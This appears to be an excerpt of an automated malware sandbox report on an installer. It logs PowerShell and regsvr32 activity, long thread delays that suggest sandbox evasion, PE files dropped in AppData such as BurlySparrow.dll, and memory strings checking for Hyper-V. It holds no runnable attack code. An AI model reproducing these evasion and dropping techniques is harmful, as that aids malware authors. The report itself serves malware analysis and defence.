Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7781Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1949Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6844Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2824Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6444
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3319
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-SF7GG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-L5KBT.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-53639
Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 8.9 %
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7820Thread sleep count: 38 > 30Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7820Thread sleep time: -38000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 7781 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 1949 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 6844 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep count: 2824 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 6444 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 3319 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C85BC60 GetSystemInfo,memcpy,memcpy,7_2_6C85BC60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1947196504.00000000047A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service?
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processorsi
Source: regsvr32.exe, 00000007.00000003.1736636212.00000000028B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cache9588WININET: Bytes from server9590WINHTTP: Bytes from cache9592WINHTTP: Bytes from server9594OTHER: Bytes from cache9596OTHER: Bytes from server9598Discovery: Attempted discoveries9600Local Cache: Cache complete file segments9602Local Cache: Cache partial file segments9604Hosted Cache: Client file segment offers made9606Retrieval: Average branch rate9608Discovery: Successful discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes}
Source: regsvr32.exe, 00000007.00000003.1758024046.00000000041C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference 